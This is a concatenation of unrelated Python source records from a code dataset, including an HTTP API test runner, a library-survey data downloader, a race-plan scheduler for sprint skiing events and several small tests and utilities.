# returned values.
if (self.preexec):
print("[INFO] Running preexec.");
tmp = self.preexec();
if (tmp and 'data_request' in tmp):
self.headers_request.update(
tmp['data_request']
);
if (tmp and 'headers_request' in tmp):
self.headers_request.update(
tmp['headers_request']
);
# Convert data to the correct format.
req_ct = self.get_req_header('Content-Type');
if (self.request_method == self.METHOD_POST):
params = {};
if (req_ct == self.MIME_JSON):
data = json.dumps(self.data_request);
else:
data = self.data_request;
elif (self.request_method == self.METHOD_GET):
data = "";
params = self.data_request;
# Send the correct request.
try:
req = requests.request(
method = self.request_method,
url = self.host + self.url,
data = data,
params = params,
cookies = self.cookies_request,
headers = self.headers_request
);
except requests.exceptions.ConnectionError:
print(
"[ERROR] Failed to connect to server. " +
"Is the server running?"
);
sys.exit(1);
# Store the response mimetype.
resp_ct = req.headers['Content-Type'];
if (not resp_ct or
re.match('^' + self.MIME_TEXT + '.*', resp_ct)):
self.resp_mime = self.MIME_TEXT;
elif (re.match('^' + self.MIME_JSON + '.*', resp_ct)):
self.resp_mime = self.MIME_JSON;
else:
print(
"Unknown response mimetype: '" + resp_ct +
"'. Using '" + self.MIME_TEXT + "'."
);
self.resp_mime = self.MIME_TEXT;
# Validate response.
ret += self.handle_status(req);
ret += self.handle_headers(req);
ret += self.handle_data(req);
if (len(ret)):
# Print errors.
for err in ret:
err.printerr();
print("############ Information ############\n");
# Dump request and response.
print("======= Request =======");
print(">> URL: " + req.url);
print(">> Header dump:");
print(json.dumps(
self.headers_request,
indent=4
));
print(">> Body dump:");
print(json.dumps(
self.data_request,
indent=4
));
print("========================\n");
print("======= Response =======");
print(">> Status code: " + str(req.status_code));
print(">> Header dump:");
print(json.dumps(
dict(req.headers.items()),
indent=4
));
print(">> Body dump:");
if (self.resp_mime == self.MIME_JSON):
try:
print(json.dumps(
req.json(),
indent=4
));
except json.decoder.JSONDecodeError:
print(">>> JSON decoding " +
"failed. Printing " +
"raw dump.");
print(req.text);
elif (self.resp_mime == self.MIME_TEXT):
print(req.text);
else:
raise Exception(
"Unknown response mime type."
);
print("========================\n")
print("#####################################");
# Run the postexec function.
if (self.postexec):
print("[INFO] Running postexec.");
self.postexec(len(ret) == 0, req);
def get_req_header(self, header):
if (header in self.headers_request):
return self.headers_request[header];
else:
return None;
def handle_status(self, req: Response) -> List[UnitError]:
if not self.status_expect == req.status_code:
return [UnitStatusError(
req.status_code,
self.status_expect
)];
else:
return [];
def handle_headers(self, req: Response) -> List[UnitError]:
#
# Compare the response headers of 'req' with the
# expected headers.
#
ret: List[UnitError] = [];
r = req.headers;
e = self.headers_expect;
# Check expected header keys.
if self.headers_expect_strict:
if not set(r.keys()) == set(e.keys()):
ret.append(UnitHeaderKeyError(
r.keys(), e.keys(), True
));
return ret;
else:
if not (set(r.keys()) & set(e.keys())
== set(e.keys())):
ret.append(UnitHeaderKeyError(
r.keys(), e.keys(), False
));
return ret;
# Check expected header values.
for k in e.keys():
if not (e[k].validate(r[k])):
ret.append(UnitHeaderError(
k, r[k], e[k]
));
return ret;
def handle_data(self, req: Response) -> List[UnitError]:
#
# Handle response data.
#
if (self.resp_mime == self.MIME_JSON):
return self.handle_json(req);
elif (self.resp_mime == self.MIME_TEXT):
return self.handle_text(req);
def handle_json(self, req: Response) -> List[UnitError]:
#
# Compare the response JSON of 'req' with the
# expected JSON response.
#
ret: List[UnitError] = [];
r = None;
e = self.data_expect;
# Parse JSON response.
try:
r = req.json();
except ValueError:
ret.append(UnitDataTypeError("JSON").printerr());
return ret;
# Check expected keys.
if (self.data_expect_strict):
if not (set(e.keys()) == set(r.keys())):
ret.append(UnitJsonDataKeyError(
r.keys(), e.keys(), True
));
return ret;
else:
if not (set(e.keys()) & set(r.keys())
== set(e.keys())):
ret.append(UnitJsonDataKeyError(
r.keys(), e.keys(), False
));
return ret;
# Check expected data.
for k in e.keys():
if not e[k].validate(r[k]):
ret.append(UnitJsonDataError(
k, r[k], e[k]
));
return ret;
def handle_text(self, req: Response) -> List[UnitError]:
if self.data_expect == None:
return [];
elif not self.data_expect.validate(req.text):
return [UnitTextDataError(
req.text,
self.data_expect
)];
return [];
def run_tests(tests: list) -> None:
for t in tests:
t.run();
| StarcoderdataPython |
3306935 | # Copyright 2020 Curtin University
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Author: <NAME>
import os
import unittest
from click.testing import CliRunner
from observatory.platform.cli.generate_command import GenerateCommand
class TestGenerateCommand(unittest.TestCase):
def test_generate_fernet_key(self):
cmd = GenerateCommand()
# Test that keys are random
num_keys = 100
random_keys = [cmd.generate_fernet_key() for _ in range(num_keys)]
self.assertEqual(len(set(random_keys)), num_keys)
# Test that keys have length of 44
expected_key_len = 44
[self.assertEqual(expected_key_len, len(key)) for key in random_keys]
def test_generate_local_config(self):
cmd = GenerateCommand()
config_path = 'config.yaml'
with CliRunner().isolated_filesystem():
cmd.generate_local_config(config_path)
self.assertTrue(os.path.exists(config_path))
def test_generate_terraform_config(self):
cmd = GenerateCommand()
config_path = 'config-terraform.yaml'
with CliRunner().isolated_filesystem():
cmd.generate_terraform_config(config_path)
self.assertTrue(os.path.exists(config_path))
| StarcoderdataPython |
57323 | """test_cvvidproc.py
First, shows image of ISCO pump setup, closes when user clicks spacebar
Second, shows first frame of video of inner stream, closes when user clicks spacebar
Third, computes background of samples video. Should look like first frame^ w/o objects.
"""
import time
import cv2
import cvvidproc
import sys
sys.path.append('../src/')
import cvimproc.improc as improc
# test 0: shows image of isco pump
image = cv2.imread('../input/images/img.jpg')
cv2.imshow('Click spacebar', image)
cv2.waitKey(0)
cv2.destroyAllWindows()
# test 1: shows frame from vide of inner stream
vid_path = '../input/videos/vid2.mp4'
# loads video
cap = cv2.VideoCapture(vid_path)
ret, frame = cap.read()
cv2.imshow('Click spacebar', frame)
cv2.waitKey(0)
cv2.destroyAllWindows()
cap.release()
# test 2: computes background from video and shows result
bkgd = improc.compute_bkgd_med_thread(vid_path, num_frames=1000, max_threads=12)
cv2.imshow('Background -- click spacebar', bkgd)
cv2.waitKey(0)
cv2.destroyAllWindows()
# compare to previous, unoptimized, fully Python background algorithm in "Kornfield/ANALYSIS/improc-dev/bkg_alg_koe/test_python_speed.py"
| StarcoderdataPython |
3295784 | from pepmass.glycomass import GlycanNode
from print_tree import print_tree
class print_glycan_struct(print_tree):
def __init__(self, glycan, **kwargs):
if isinstance(glycan, str):
glycan = GlycanNode.from_str(glycan)
super(print_glycan_struct, self).__init__(glycan, **kwargs)
def get_children(self, node):
return node.children or []
def get_node_str(self, node):
return str(node.monosaccharide)
if __name__ == '__main__':
print_glycan_struct('(N(N(H(H(H(H)))(H(H(H(H)))))))')
print_glycan_struct('(N(N(H(H)(H(H(H))(H(H(H)))))))')
print_glycan_struct('(N(N(H(H(H(H)))(H(H)(H(H))))))')
| StarcoderdataPython |
74165 | <gh_stars>0
# -*- coding: utf-8 -*-
import base64
from marshmallow import Schema, post_load, fields
from fuocore.schemas import SongSchema
from fuocore.utils import elfhash
SOURCE = 'local'
class EasyMP3MetadataSongSchema(Schema):
"""EasyMP3 metadata"""
url = fields.Str(required=True)
title_list = fields.List(fields.Str(), load_from='title', required=True)
duration = fields.Float(required=True)
artist_name_list = fields.List(fields.Str(), load_from='artist')
album_name_list = fields.List(fields.Str(), load_from='album')
@post_load
def create_song_model(self, data):
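        # Derive a stable local identifier by hashing the base64-encoded file URL.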
title_list = data.get('title_list', [])
title = title_list[0] if title_list else 'Unknown'
artist_name_list = data.get('artist_name_list', [])
album_name_list = data.get('album_name_list', [])
identifier = str(elfhash(base64.b64encode(bytes(data['url'], 'utf-8'))))
song_data = {
'source': SOURCE,
'identifier': identifier,
'title': title,
'duration': data['duration'],
'url': data['url'],
'artists': [{'name': name, 'identifier': name, 'source': SOURCE}
for name in artist_name_list]
}
if album_name_list:
song_data['album'] = {'name': album_name_list[0],
'identifier': album_name_list[0],
'source': SOURCE}
song, _ = SongSchema(strict=True).load(song_data)
return song
| StarcoderdataPython |
1797441 | #! /usr/bin/env python
#coding=utf-8
from setuptools import setup
import linciclient
setup_args = {
'name': "linciclient",
'version': linciclient.__version__,
'description': "linci client tools",
'long_description': "linci client tools for ",
'author': linciclient.__author__,
'author_email': linciclient.__author_email__,
'url': linciclient.__url__,
'license': linciclient.__license__,
'classifiers': [
'Development Status :: 2 - Pre-Alpha',
'Environment :: No Input/Output (Daemon)',
'Environment :: Console',
'Framework :: Uliweb',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Topic :: Software Development :: Build Tools',
'Topic :: Software Development :: Testing',
],
'packages': [
"linciclient",
],
'entry_points' : {
'console_scripts': [
'linci_client_config = linciclient.config:main',
'linci_arti_open = linciclient.artifact.open:main',
'linci_arti_upload = linciclient.artifact.upload:main',
'linci_arti_set_ready = linciclient.artifact.set_ready:main',
'linci_arti_fix = linciclient.artifact.fix:main',
'linci_arti_download = linciclient.artifact.download:main',
'linci_arti_close = linciclient.artifact.close:main',
'linci_worker = linciclient.worker:main',
],
},
}
setup(**setup_args)
| StarcoderdataPython |
1714725 | <reponame>langrenn-sprint/race-service
"""Module for raceplan commands."""
from datetime import date, datetime, time, timedelta
from typing import Any, Dict, List, Tuple, Union
from race_service.models import IndividualSprintRace, Raceplan
async def calculate_raceplan_individual_sprint( # noqa: C901
event: dict,
format_configuration: dict,
raceclasses: List[dict],
) -> Tuple[Raceplan, List[IndividualSprintRace]]:
"""Calculate raceplan for Individual Sprint event."""
# Initialize
raceplan = Raceplan(event_id=event["id"], races=list())
races: List[IndividualSprintRace] = []
# We get the number of contestants in plan from the raceclasses:
raceplan.no_of_contestants = sum(
raceclass["no_of_contestants"] for raceclass in raceclasses
)
# First we prepare the parameters:
# get the time_between_groups as timedelta:
TIME_BETWEEN_GROUPS = timedelta(
hours=time.fromisoformat(format_configuration["time_between_groups"]).hour,
minutes=time.fromisoformat(format_configuration["time_between_groups"]).minute,
seconds=time.fromisoformat(format_configuration["time_between_groups"]).second,
)
TIME_BETWEEN_HEATS = timedelta(
hours=time.fromisoformat(format_configuration["time_between_heats"]).hour,
minutes=time.fromisoformat(format_configuration["time_between_heats"]).minute,
seconds=time.fromisoformat(format_configuration["time_between_heats"]).second,
)
TIME_BETWEEN_ROUNDS = timedelta(
hours=time.fromisoformat(format_configuration["time_between_rounds"]).hour,
minutes=time.fromisoformat(format_configuration["time_between_rounds"]).minute,
seconds=time.fromisoformat(format_configuration["time_between_rounds"]).second,
)
# get the first start_time from the event:
start_time = datetime.combine(
date.fromisoformat(event["date_of_event"]),
time.fromisoformat(event["time_of_event"]),
)
# Sort the raceclasses on group and order:
raceclasses_sorted = sorted(raceclasses, key=lambda k: (k["group"], k["order"]))
# We need to group the raceclasses by group:
d: Dict[int, list] = {}
for raceclass in raceclasses_sorted:
d.setdefault(raceclass["group"], []).append(raceclass)
raceclasses_grouped = list(d.values())
# Generate the races, group by group, based on configuration and number of contestants
order = 1
for raceclasses in raceclasses_grouped:
# Initalize ConfigMatrix pr group:
ConfigMatrix.initialize(format_configuration, raceclasses)
for round in ConfigMatrix.get_rounds():
for raceclass in raceclasses:
for index in reversed(ConfigMatrix.get_race_indexes(raceclass, round)):
for heat in range(
1, ConfigMatrix.get_no_of_heats(raceclass, round, index) + 1
):
race = IndividualSprintRace(
id="",
order=order,
raceclass=raceclass["name"],
round=round,
index="" if round in ["Q", "R1", "R2"] else index,
heat=heat,
start_time=start_time,
max_no_of_contestants=format_configuration[
"max_no_of_contestants_in_race"
],
no_of_contestants=0,
rule={}
if round in ["F", "R2"]
else ConfigMatrix.get_rule_from_to(raceclass, round, index),
event_id=event["id"],
raceplan_id="",
start_entries=[],
results={},
)
order += 1
# Calculate start_time for next heat:
start_time = start_time + TIME_BETWEEN_HEATS
# Add the race to the raceplan:
races.append(race)
# Calculate start_time for next round:
if round in ConfigMatrix.get_rounds_in_raceclass(raceclass):
start_time = start_time - TIME_BETWEEN_HEATS + TIME_BETWEEN_ROUNDS
# Calculate start_time for next group:
start_time = start_time + TIME_BETWEEN_GROUPS
# We need to calculate the number of contestants pr race:
for raceclasses in raceclasses_grouped:
for raceclass in raceclasses:
if raceclass["ranking"]:
await _calculate_number_of_contestants_pr_race_in_raceclass_ranked(
raceclass, races
)
else:
await _calculate_number_of_contestants_pr_race_in_raceclass_non_ranked(
raceclass, races
)
return raceplan, races
async def _calculate_number_of_contestants_pr_race_in_raceclass_ranked( # noqa: C901
raceclass: dict, races: List[IndividualSprintRace]
) -> None:
"""Calculate number of contestants pr race in given raceclass."""
no_of_Qs = len(
[
race
for race in races
if race.raceclass == raceclass["name"] and race.round == "Q"
]
)
no_of_SAs = len(
[
race
for race in races
if race.raceclass == raceclass["name"]
and race.round == "S"
and race.index == "A"
]
)
no_of_SCs = len(
[
race
for race in races
if race.raceclass == raceclass["name"]
and race.round == "S"
and race.index == "C"
]
)
no_of_contestants_to_Qs = raceclass["no_of_contestants"]
no_of_contestants_to_SAs = 0
no_of_contestants_to_SCs = 0
no_of_contestants_to_FA = 0
no_of_contestants_to_FB = 0
no_of_contestants_to_FC = 0
# Calculate number of contestants pr heat in Q:
for race in [
race
for race in races
if race.raceclass == raceclass["name"] and race.round == "Q"
]:
# First we calculate no of contestants in each Q race:
# We need to "smooth" the contestants across the heats:
quotient, remainder = divmod(
no_of_contestants_to_Qs,
no_of_Qs,
)
if race.heat <= remainder:
race.no_of_contestants = quotient + 1
else:
race.no_of_contestants = quotient
# If there is to be a round "S" or "F", calculate number of contestants in SA, SC and FC:
for race in [
race
for race in races
if race.raceclass == raceclass["name"] and race.round == "Q"
]:
if "S" in race.rule:
# Then, for each race in round Q, some goes to SA:
no_of_contestants_to_SAs += race.rule["S"]["A"] # type: ignore
# rest to SC:
if race.rule["S"]["C"] != 0:
no_of_contestants_to_SCs += race.no_of_contestants - race.rule["S"]["A"] # type: ignore
# or the rest may in some cases go directly to FC:
if "F" in race.rule:
if "C" in race.rule["F"]:
no_of_contestants_to_FC += race.no_of_contestants - race.rule["S"]["A"] # type: ignore
if "A" in race.rule["F"]:
if race.rule["F"]["A"] > race.no_of_contestants:
no_of_contestants_to_FA = race.no_of_contestants
else:
no_of_contestants_to_FA += race.rule["F"]["A"] # type: ignore
# rest to FB:
if "B" in race.rule["F"]:
if race.rule["F"]["B"] < float("inf"):
no_of_contestants_to_FB += race.rule["F"]["B"] # type: ignore
else:
no_of_contestants_to_FB += race.no_of_contestants - race.rule["F"]["A"] # type: ignore
# Calculate number of contestants pr heat in SA:
for race in [
race
for race in races
if race.raceclass == raceclass["name"]
and race.round == "S"
and race.index == "A"
]:
quotient, remainder = divmod(
no_of_contestants_to_SAs,
no_of_SAs,
)
if race.heat <= remainder:
race.no_of_contestants = quotient + 1
else:
race.no_of_contestants = quotient
# Calculate number of contestants pr heat in SC:
for race in [
race
for race in races
if race.raceclass == raceclass["name"]
and race.round == "S"
and race.index == "C"
]:
quotient, remainder = divmod(
no_of_contestants_to_SCs,
no_of_SCs,
)
if race.heat <= remainder:
race.no_of_contestants = quotient + 1
else:
race.no_of_contestants = quotient
# Calculate number of contestants in FA, FB and FC:
for race in [
race
for race in races
if race.raceclass == raceclass["name"] and race.round == "S"
]:
if "F" in race.rule:
if "A" in race.rule["F"]:
no_of_contestants_to_FA += race.rule["F"]["A"] # type: ignore
if "B" in race.rule["F"]:
if race.rule["F"]["B"] < float("inf"):
no_of_contestants_to_FB += race.rule["F"]["B"] # type: ignore
else:
no_of_contestants_to_FB += race.no_of_contestants - race.rule["F"]["A"] # type: ignore
if "C" in race.rule["F"]:
no_of_contestants_to_FC += race.rule["F"]["C"] # type: ignore
# Calculate number of contestants pr heat in FA:
for race in [
race
for race in races
if race.raceclass == raceclass["name"]
and race.round == "F"
and race.index == "A"
]:
        # There will always be only one FA, simplifying:
race.no_of_contestants = no_of_contestants_to_FA
# Calculate number of contestants pr heat in FB:
for race in [
race
for race in races
if race.raceclass == raceclass["name"]
and race.round == "F"
and race.index == "B"
]:
        # There will always be only one FB, simplifying:
race.no_of_contestants = no_of_contestants_to_FB
# Calculate number of contestants pr heat in FC:
for race in [
race
for race in races
if race.raceclass == raceclass["name"]
and race.round == "F"
and race.index == "C"
]:
        # There will always be only one FC, simplifying:
race.no_of_contestants = no_of_contestants_to_FC
async def _calculate_number_of_contestants_pr_race_in_raceclass_non_ranked( # noqa: C901
raceclass: dict, races: List[IndividualSprintRace]
) -> None:
"""Calculate number of contestants pr race in given raceclass."""
no_of_R1s = no_of_R2s = len(
[
race
for race in races
if race.raceclass == raceclass["name"] and race.round == "R1"
]
)
no_of_contestants_to_R1 = no_of_contestants_to_R2 = raceclass["no_of_contestants"]
# Calculate number of contestants pr heat in R1:
for race in [
race
for race in races
if race.raceclass == raceclass["name"] and race.round == "R1"
]:
        # First we calculate no of contestants in each R1 race:
# We need to "smooth" the contestants across the heats:
quotient, remainder = divmod(
no_of_contestants_to_R1,
no_of_R1s,
)
if race.heat <= remainder:
race.no_of_contestants = quotient + 1
else:
race.no_of_contestants = quotient
# Calculate number of contestants pr heat in R2:
for race in [
race
for race in races
if race.raceclass == raceclass["name"] and race.round == "R2"
]:
        # First we calculate no of contestants in each R2 race:
# We need to "smooth" the contestants across the heats:
quotient, remainder = divmod(
no_of_contestants_to_R2,
no_of_R2s,
)
if race.heat <= remainder:
race.no_of_contestants = quotient + 1
else:
race.no_of_contestants = quotient
class ConfigMatrix:
"""Class to represent the config matrix."""
ROUNDS: List[str] = []
RANKING: bool = True
MAX_NO_OF_CONTESTANTS_IN_RACECLASS: int
MAX_NO_OF_CONTESTANTS_IN_RACE: int
m: Dict[int, Dict[str, Any]] = {}
@classmethod
def initialize(
cls: Any, format_configuration: Dict, raceclasses_in_group: List[Dict]
) -> None:
"""Initalize parameters based on format-configuration and raceclasses in group."""
if raceclasses_in_group[0]["ranking"]:
ConfigMatrix.RANKING = True
else:
ConfigMatrix.RANKING = False
if ConfigMatrix.RANKING:
ConfigMatrix.ROUNDS = ["Q", "S", "F"]
else:
ConfigMatrix.ROUNDS = ["R1", "R2"]
ConfigMatrix.MAX_NO_OF_CONTESTANTS_IN_RACECLASS = format_configuration[
"max_no_of_contestants_in_raceclass"
]
ConfigMatrix.MAX_NO_OF_CONTESTANTS_IN_RACE = format_configuration[
"max_no_of_contestants_in_race"
]
# Initialize matrix
# TODO: Get this from format-configuration
ALL = ConfigMatrix.MAX_NO_OF_CONTESTANTS_IN_RACE
REST = float("inf")
if ConfigMatrix.RANKING:
# ConfigMatrix for ranked raceclasses:
ConfigMatrix.m[1] = {
"lim_no_contestants": 7,
"rounds": ["Q", "F"],
"no_of_heats": {
"Q": {"A": 1},
"F": {"A": 1, "B": 0, "C": 0},
},
"from_to": {
"Q": {"A": {"F": {"A": ALL, "B": 0}}, "C": {"F": {"C": 0}}},
},
}
ConfigMatrix.m[2] = {
"lim_no_contestants": 16,
"rounds": ["Q", "F"],
"no_of_heats": {
"Q": {"A": 2},
"F": {"A": 1, "B": 1, "C": 0},
},
"from_to": {
"Q": {"A": {"F": {"A": 4, "B": REST}}, "C": {"F": {"C": 0}}},
},
}
ConfigMatrix.m[3] = {
"lim_no_contestants": 24,
"rounds": ["Q", "S", "F"],
"no_of_heats": {
"Q": {"A": 3},
"S": {"A": 2, "C": 0},
"F": {"A": 1, "B": 1, "C": 1},
},
"from_to": {
"Q": {"A": {"S": {"A": 5, "C": 0}, "F": {"C": REST}}},
"S": {"A": {"F": {"A": 4, "B": REST}}, "C": {"F": {"C": 0}}},
},
}
ConfigMatrix.m[4] = {
"lim_no_contestants": 32,
"rounds": ["Q", "S", "F"],
"no_of_heats": {
"Q": {"A": 4},
"S": {"A": 2, "C": 2},
"F": {"A": 1, "B": 1, "C": 1},
},
"from_to": {
"Q": {"A": {"S": {"A": 4, "C": REST}}},
"S": {"A": {"F": {"A": 4, "B": REST}}, "C": {"F": {"C": 4}}},
},
}
ConfigMatrix.m[5] = {
"lim_no_contestants": 40,
"rounds": ["Q", "S", "F"],
"no_of_heats": {
"Q": {"A": 6},
"S": {"A": 4, "C": 2},
"F": {"A": 1, "B": 1, "C": 1},
},
"from_to": {
"Q": {"A": {"S": {"A": 4, "C": REST}}},
"S": {"A": {"F": {"A": 2, "B": 2}}, "C": {"F": {"C": 4}}},
},
}
ConfigMatrix.m[6] = {
"lim_no_contestants": 48,
"rounds": ["Q", "S", "F"],
"no_of_heats": {
"Q": {"A": 6},
"S": {"A": 4, "C": 4},
"F": {"A": 1, "B": 1, "C": 1},
},
"from_to": {
"Q": {"A": {"S": {"A": 4, "C": REST}}},
"S": {"A": {"F": {"A": 2, "B": 2}}, "C": {"F": {"C": 2}}},
},
}
ConfigMatrix.m[7] = {
"lim_no_contestants": 56,
"rounds": ["Q", "S", "F"],
"no_of_heats": {
"Q": {"A": 7},
"S": {"A": 4, "C": 4},
"F": {"A": 1, "B": 1, "C": 1},
},
"from_to": {
"Q": {"A": {"S": {"A": 4, "C": REST}}},
"S": {"A": {"F": {"A": 2, "B": 2}}, "C": {"F": {"C": 2}}},
},
}
ConfigMatrix.m[8] = {
"lim_no_contestants": ConfigMatrix.MAX_NO_OF_CONTESTANTS_IN_RACECLASS,
"rounds": ["Q", "S", "F"],
"no_of_heats": {
"Q": {"A": 8},
"S": {"A": 4, "C": 4},
"F": {"A": 1, "B": 1, "C": 1},
},
"from_to": {
"Q": {"A": {"S": {"A": 4, "C": REST}}},
"S": {"A": {"F": {"A": 2, "B": 2}}, "C": {"F": {"C": 2}}},
},
}
else:
# ConfigMatrix for non ranked raceclasses:
ConfigMatrix.m[1] = {
"lim_no_contestants": 7,
"rounds": ["R1", "R2"],
"no_of_heats": {
"R1": {"A": 1},
"R2": {"A": 1},
},
"from_to": {
"R1": {"A": {"R2": {"A": REST}}},
},
}
ConfigMatrix.m[2] = {
"lim_no_contestants": 16,
"rounds": ["R1", "R2"],
"no_of_heats": {
"R1": {"A": 2},
"R2": {"A": 2},
},
"from_to": {
"R1": {"A": {"R2": {"A": REST}}},
},
}
ConfigMatrix.m[3] = {
"lim_no_contestants": 24,
"rounds": ["R1", "R2"],
"no_of_heats": {
"R1": {"A": 3},
"R2": {"A": 3},
},
"from_to": {
"R1": {"A": {"R2": {"A": REST}}},
},
}
ConfigMatrix.m[4] = {
"lim_no_contestants": 32,
"rounds": ["R1", "R2"],
"no_of_heats": {
"R1": {"A": 4},
"R2": {"A": 4},
},
"from_to": {
"R1": {"A": {"R2": {"A": REST}}},
},
}
ConfigMatrix.m[5] = {
"lim_no_contestants": 40,
"rounds": ["R1", "R2"],
"no_of_heats": {
"R1": {"A": 6},
"R2": {"A": 6},
},
"from_to": {
"R1": {"A": {"R2": {"A": REST}}},
},
}
ConfigMatrix.m[6] = {
"lim_no_contestants": 48,
"rounds": ["R1", "R2"],
"no_of_heats": {
"R1": {"A": 6},
"R2": {"A": 6},
},
"from_to": {
"R1": {"A": {"R2": {"A": REST}}},
},
}
ConfigMatrix.m[7] = {
"lim_no_contestants": 56,
"rounds": ["R1", "R2"],
"no_of_heats": {
"R1": {"A": 7},
"R2": {"A": 7},
},
"from_to": {
"R1": {"A": {"R2": {"A": REST}}},
},
}
ConfigMatrix.m[8] = {
"lim_no_contestants": ConfigMatrix.MAX_NO_OF_CONTESTANTS_IN_RACECLASS,
"rounds": ["R1", "R2"],
"no_of_heats": {
"R1": {"A": 8},
"R2": {"A": 8},
},
"from_to": {
"R1": {"A": {"R2": {"A": REST}}},
},
}
@classmethod
def get_rounds(cls: Any) -> list:
"""Get default rounds."""
return ConfigMatrix.ROUNDS
@classmethod
def get_rounds_in_raceclass(cls: Any, raceclass: dict) -> list:
"""Get actual rounds in raceclass."""
_key = ConfigMatrix._get_key(raceclass["no_of_contestants"])
return ConfigMatrix.m[_key]["rounds"]
@classmethod
def get_no_of_heats(cls: Any, raceclass: dict, round: str, index: str) -> int:
"""Get no of heats pr round and index."""
_key = ConfigMatrix._get_key(raceclass["no_of_contestants"])
return ConfigMatrix.m[_key]["no_of_heats"][round][index]
@classmethod
def get_race_indexes(cls: Any, raceclass: dict, round: str) -> list:
"""Get race indexes pr round."""
_key = ConfigMatrix._get_key(raceclass["no_of_contestants"])
if round not in ConfigMatrix.m[_key]["no_of_heats"]:
return []
return [key for key in ConfigMatrix.m[_key]["no_of_heats"][round]]
@classmethod
def get_rule_from_to(
cls: Any,
raceclass: dict,
from_round: str,
from_index: str,
) -> Dict[str, Dict[str, Union[int, float]]]:
"""Get race rule pr round and index."""
_key = ConfigMatrix._get_key(raceclass["no_of_contestants"])
return ConfigMatrix.m[_key]["from_to"][from_round][from_index]
@classmethod
def _get_key(cls: Any, no_of_contestants: int) -> int:
"""Looks up key of matrix based on no_of_contestants."""
if 1 <= no_of_contestants <= 7:
return 1
elif 7 < no_of_contestants <= 16:
return 2
elif 16 < no_of_contestants <= 24:
return 3
elif 24 < no_of_contestants <= 32:
return 4
elif 32 < no_of_contestants <= 40:
return 5
elif 40 < no_of_contestants <= 48:
return 6
elif 48 < no_of_contestants <= 56:
return 7
elif 56 < no_of_contestants <= ConfigMatrix.MAX_NO_OF_CONTESTANTS_IN_RACECLASS:
return 8
else:
raise ValueError(
f"Unsupported value for no of contestants: {no_of_contestants}"
)
| StarcoderdataPython |
31582 | # pyright: reportUnknownMemberType=false
import logging
import zipfile
from pathlib import Path
from typing import Dict
import requests
from us_pls._config import Config
from us_pls._download.interface import IDownloadService
from us_pls._download.models import DatafileType, DownloadType
from us_pls._logger.interface import ILoggerFactory
from us_pls._persistence.interface import IOnDiskCache
from us_pls._scraper.interface import IScrapingService
BASE_URL = "https://www.imls.gov"
class DownloadService(IDownloadService):
_config: Config
_scraper: IScrapingService
_cache: IOnDiskCache
_logger: logging.Logger
def __init__(
self,
config: Config,
scraper: IScrapingService,
cache: IOnDiskCache,
logger_factory: ILoggerFactory,
) -> None:
self._config = config
self._scraper = scraper
self._cache = cache
self._logger = logger_factory.get_logger(__name__)
def download(self) -> None:
scraped_dict = self._scraper.scrape_files()
scraped_dict_for_year = scraped_dict.get(str(self._config.year))
if scraped_dict_for_year is None:
self._logger.info(f"There is no data for {self._config.year}")
return
self._try_download_resource(
scraped_dict_for_year, "Documentation", DownloadType.Documentation
)
self._try_download_resource(scraped_dict_for_year, "CSV", DownloadType.CsvZip)
self._try_download_resource(
scraped_dict_for_year,
"Data Element Definitions",
DownloadType.DataElementDefinitions,
)
self._clean_up_readme()
def _try_download_resource(
self, scraped_dict: Dict[str, str], resource: str, download_type: DownloadType
) -> None:
route = scraped_dict.get(resource)
self._logger.debug(f"Trying to download {resource}")
if route is None:
self._logger.warning(
f"The resource `{resource}` does not exist for {self._config.year}"
)
return
if self._resource_already_exists(download_type):
self._logger.debug(
f"Resources have already been downloaded for {download_type.value}"
)
return
url = f"{BASE_URL}/{route[1:] if route.startswith('/') else route}"
res = requests.get(url)
if res.status_code != 200:
msg = f"Received a non-200 status code for {url}: {res.status_code}"
self._logger.warning(msg)
return
self._write_content(
download_type,
res.content,
should_unzip=str(download_type.value).endswith(".zip"),
)
def _resource_already_exists(self, download_type: DownloadType) -> bool:
if download_type in [
DownloadType.Documentation,
DownloadType.DataElementDefinitions,
]:
return self._cache.exists(download_type.value)
elif download_type == DownloadType.CsvZip:
return all(
[
self._cache.exists(str(datafile_type.value))
for datafile_type in DatafileType
]
)
return False
def _write_content(
self, download_type: DownloadType, content: bytes, should_unzip: bool = False
) -> None:
self._cache.put(content, download_type.value)
if should_unzip:
zip_path = self._cache.cache_path / Path(download_type.value)
with zipfile.ZipFile(zip_path, "r") as zip_ref:
zip_ref.extractall(self._cache.cache_path)
self._move_content()
self._cache.remove(zip_path)
def _move_content(self) -> None:
for path in self._cache.cache_path.iterdir():
if not path.is_dir():
self._rename(path)
continue
for sub_path in path.iterdir():
self._rename(sub_path)
self._cache.remove(path)
def _rename(self, path: Path) -> None:
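        # Map the various file-name conventions used across survey years onto
        # the fixed DatafileType names.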
new_name: str = path.name
if "_ae_" in path.name.lower() or "ld" in path.name.lower():
new_name = DatafileType.SystemData.value
elif "_outlet_" in path.name.lower() or "out" in path.name.lower():
new_name = DatafileType.OutletData.value
elif "_state_" in path.name.lower() or "sum" in path.name.lower():
new_name = DatafileType.SummaryData.value
elif "readme" in path.name.lower():
new_name = "README.txt"
self._cache.rename(path, Path(new_name))
def _clean_up_readme(self):
self._logger.debug("Cleaning up readme")
readme_text = self._cache.get(
"README.txt",
"txt",
encoding="utf-8",
errors="surrogateescape",
)
if readme_text is None:
self._logger.debug("No readme exists for this year")
return
cleaned_readme_text = "".join([c if ord(c) < 128 else "'" for c in readme_text])
self._cache.put(
bytes(cleaned_readme_text, "utf-8"),
"README.txt",
)
| StarcoderdataPython |
1662578 | <gh_stars>0
import unittest
import numpy as np
import numpy.testing as tst
import splearn as spl
class TestSp(unittest.TestCase):
def setUp(self):
self.data = np.array([[0, 0],
[0, 1],
[1, 0],
[1, 1]], dtype='float64')
self.target = np.array([[0, 0],
[1, 0],
[1, 0],
[0, 1]], dtype='float64')
def test_constructor(self):
randomlayers = np.random.randint(1, 6, 5)
def test_numpy(expected, value):
expected.insert(0, np.zeros(shape=(2, 1)))
expected.append(np.zeros(shape=(2, 1)))
for exp, t in zip(expected, value):
                self.assertEqual(exp.shape, t.shape)
# Test constructor with values for layers
neural1 = spl.MLP(9, 5).fit(self.data, self.target)
